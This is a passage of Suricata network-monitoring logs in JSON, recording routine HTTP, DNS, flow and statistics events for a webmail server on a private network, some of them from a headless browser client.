{"timestamp":"2020-02-29T00:11:43.053234+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/textarearesize.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":833},"app_proto":"http","fileinfo":{"filename":"\/js\/textarearesize.js","state":"CLOSED","stored":false,"size":2039,"tx_id":5}} 
{"timestamp":"2020-02-29T00:11:43.053530+0000","flow_id":150206485572827,"event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","length":0}} {"timestamp":"2020-02-29T00:11:43.160141+0000","flow_id":1491464643110889,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/message_source.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119}} {"timestamp":"2020-02-29T00:11:44.693232+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34800,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1396,"tx_id":2}} 
{"timestamp":"2020-02-29T00:11:44.702093+0000","flow_id":1062938575886898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34802,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:11:45.000458+0000","flow_id":760048888043704,"event_type":"flow","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":12,"bytes_toserver":2742,"bytes_toclient":7539,"start":"2020-02-29T00:10:35.055480+0000","end":"2020-02-29T00:10:44.624902+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:45.362391+0000","flow_id":1573653137124388,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34804,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5018},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":22784,"tx_id":0}} 
{"timestamp":"2020-02-29T00:11:48.000224+0000","event_type":"stats","stats":{"uptime":14360,"capture":{"kernel_packets":134854,"kernel_drops":0},"decoder":{"pkts":134874,"bytes":92994340,"invalid":185,"ipv4":133387,"ipv6":8,"ethernet":134874,"raw":0,"null":0,"sll":0,"tcp":128131,"udp":5056,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2753,"ssn_memcap_drop":0,"pseudo":346,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2769,"synack":2760,"rst":1205,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1794,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2309,"failed_udp":111},"tx":{"http":4621,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2388}},"flow_mgr":{"closed_pruned":2728,"new_pruned":15,"est_pruned":2354,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22485,"memcap_state":0,"memcap_global":0},"http":{"memuse":72030,"memcap":0}}} 
{"timestamp":"2020-02-29T00:11:48.160966+0000","flow_id":1491464643110889,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/message_source.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/message_source.png","state":"CLOSED","stored":false,"size":119,"tx_id":0}} {"timestamp":"2020-02-29T00:11:48.199209+0000","flow_id":223250995218985,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32212,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:48.307119+0000","flow_id":223250995218985,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58990,"proto":"UDP","dns":{"type":"answer","id":32212,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:48.307119+0000","flow_id":223250995218985,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58990,"proto":"UDP","dns":{"type":"answer","id":32212,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:11:48.379377+0000","flow_id":299443715105269,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":485}} {"timestamp":"2020-02-29T00:11:48.379377+0000","flow_id":299443715105269,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":485},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/getReplyData","state":"CLOSED","stored":false,"size":78,"tx_id":0}} {"timestamp":"2020-02-29T00:11:49.000760+0000","flow_id":1668915492608187,"event_type":"flow","src_ip":"192.168.10.122","src_port":58818,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:48.579771+0000","end":"2020-02-29T00:06:48.688271+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:11:52.834518+0000","flow_id":299443715105269,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52730,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":485},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/getReplyData","state":"CLOSED","stored":false,"size":735,"tx_id":0}} {"timestamp":"2020-02-29T00:11:52.846418+0000","flow_id":447486943095378,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40980,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43778,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:52.954641+0000","flow_id":447486943095378,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40980,"proto":"UDP","dns":{"type":"answer","id":43778,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:52.954641+0000","flow_id":447486943095378,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40980,"proto":"UDP","dns":{"type":"answer","id":43778,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:11:54.000928+0000","flow_id":397725432354945,"event_type":"flow","src_ip":"192.168.10.122","src_port":45988,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:53.530561+0000","end":"2020-02-29T00:06:53.639563+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:55.000261+0000","event_type":"stats","stats":{"uptime":14367,"capture":{"kernel_packets":134889,"kernel_drops":0},"decoder":{"pkts":134892,"bytes":92999998,"invalid":186,"ipv4":133405,"ipv6":8,"ethernet":134892,"raw":0,"null":0,"sll":0,"tcp":128144,"udp":5060,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2754,"ssn_memcap_drop":0,"pseudo":346,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2770,"synack":2761,"rst":1205,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1795,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2311,"failed_udp":111},"tx":{"http":4622,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2390}},"flow_mgr":{"closed_pruned":2728,"new_pruned":15,"est_pruned":2355,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":
65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22483,"memcap_state":0,"memcap_global":0},"http":{"memuse":59670,"memcap":0}}} {"timestamp":"2020-02-29T00:11:55.000994+0000","flow_id":1133320201266640,"event_type":"flow","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":29,"pkts_toclient":34,"bytes_toserver":4321,"bytes_toclient":35958,"start":"2020-02-29T00:10:43.157136+0000","end":"2020-02-29T00:10:54.388286+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:55.001212+0000","flow_id":1058609245547071,"event_type":"flow","src_ip":"192.168.10.130","src_port":34792,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1178,"bytes_toclient":824,"start":"2020-02-29T00:10:49.092735+0000","end":"2020-02-29T00:10:54.388780+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:57.953842+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47304,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56955,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:11:58.000468+0000","flow_id":459856429493109,"event_type":"flow","src_ip":"192.168.10.122","src_port":36544,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:56.895861+0000","end":"2020-02-29T00:06:57.004740+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:58.062091+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47304,"proto":"UDP","dns":{"type":"answer","id":56955,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:58.062091+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47304,"proto":"UDP","dns":{"type":"answer","id":56955,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:58.072837+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47304,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56956,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:11:58.181226+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47304,"proto":"UDP","dns":{"type":"answer","id":56956,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:58.181226+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47304,"proto":"UDP","dns":{"type":"answer","id":56956,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:12:01.000422+0000","flow_id":463232274070173,"event_type":"flow","src_ip":"192.168.10.122","src_port":40239,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:00.719517+0000","end":"2020-02-29T00:07:00.828093+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:01.000669+0000","flow_id":339717604553391,"event_type":"flow","src_ip":"192.168.10.122","src_port":55353,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:00.242351+0000","end":"2020-02-29T00:07:00.351112+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:02.000188+0000","event_type":"stats","stats":{"uptime":14374,"capture":{"kernel_packets":134895,"kernel_drops":0},"decoder":{"pkts":134904,"bytes":93002988,"invalid":187,"ipv4":133417,"ipv6":8,"ethernet":134904,"raw":0,"null":0,"sll":0,"tcp":128151,"udp":5064,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2754,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2770,"synack":2761,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_l
ayer":{"flow":{"http":1795,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2312,"failed_udp":111},"tx":{"http":4622,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2392}},"flow_mgr":{"closed_pruned":2730,"new_pruned":15,"est_pruned":2357,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21820,"memcap_state":0,"memcap_global":0},"http":{"memuse":59510,"memcap":0}}} {"timestamp":"2020-02-29T00:12:09.000294+0000","event_type":"stats","stats":{"uptime":14381,"capture":{"kernel_packets":134905,"kernel_drops":0},"decoder":{"pkts":134906,"bytes":93003072,"invalid":187,"ipv4":133417,"ipv6":8,"ethernet":134906,"raw":0,"null":0,"sll":0,"tcp":128151,"udp":5064,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2754,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2770,"synack":2761,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1795,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2312,"failed_udp":111},"tx":{"http":4622,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2392}},"flow_mgr":{"closed_pruned":2730
,"new_pruned":15,"est_pruned":2359,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21820,"memcap_state":0,"memcap_global":0},"http":{"memuse":59510,"memcap":0}}} {"timestamp":"2020-02-29T00:12:09.001834+0000","flow_id":20416851390565,"event_type":"flow","src_ip":"192.168.10.122","src_port":49564,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:08.241765+0000","end":"2020-02-29T00:07:08.350330+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:09.001982+0000","flow_id":782648992382295,"event_type":"flow","src_ip":"192.168.10.122","src_port":48718,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:08.048471+0000","end":"2020-02-29T00:07:08.157035+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:12.000464+0000","flow_id":174022061955973,"event_type":"flow","src_ip":"192.168.10.122","src_port":57163,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:11.433029+0000","end":"2020-02-29T00:07:11.541143+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:12:16.000302+0000","event_type":"stats","stats":{"uptime":14388,"capture":{"kernel_packets":134905,"kernel_drops":0},"decoder":{"pkts":134906,"bytes":93003072,"invalid":187,"ipv4":133417,"ipv6":8,"ethernet":134906,"raw":0,"null":0,"sll":0,"tcp":128151,"udp":5064,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2754,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2770,"synack":2761,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1795,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2312,"failed_udp":111},"tx":{"http":4622,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2392}},"flow_mgr":{"closed_pruned":2730,"new_pruned":15,"est_pruned":2362,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20827,"memcap_state":0,"memcap_global":0},"http":{"memuse":59510,"memcap":0}}} 
{"timestamp":"2020-02-29T00:12:19.000426+0000","flow_id":1587654728744039,"event_type":"flow","src_ip":"192.168.10.81","src_port":52718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":10,"bytes_toserver":1285,"bytes_toclient":8956,"start":"2020-02-29T00:11:13.392295+0000","end":"2020-02-29T00:11:18.677600+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:20.598346+0000","flow_id":1584978968453450,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54606,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":21578,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:20.707223+0000","flow_id":1584978968453450,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54606,"proto":"UDP","dns":{"type":"answer","id":21578,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:20.707223+0000","flow_id":1584978968453450,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54606,"proto":"UDP","dns":{"type":"answer","id":21578,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:20.796483+0000","flow_id":1144822130078229,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34806,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
